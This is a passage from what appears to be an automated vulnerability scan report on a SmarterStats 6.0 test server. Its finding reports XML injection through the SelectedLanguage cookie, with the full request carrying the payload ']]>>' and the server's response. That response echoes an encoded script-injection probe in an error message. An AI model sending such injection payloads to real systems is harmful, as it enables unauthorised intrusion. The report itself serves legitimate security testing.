$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.12. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=SiteUsage HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=]]>>; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserSpiders"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:21 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=SiteUsage" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="..." />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
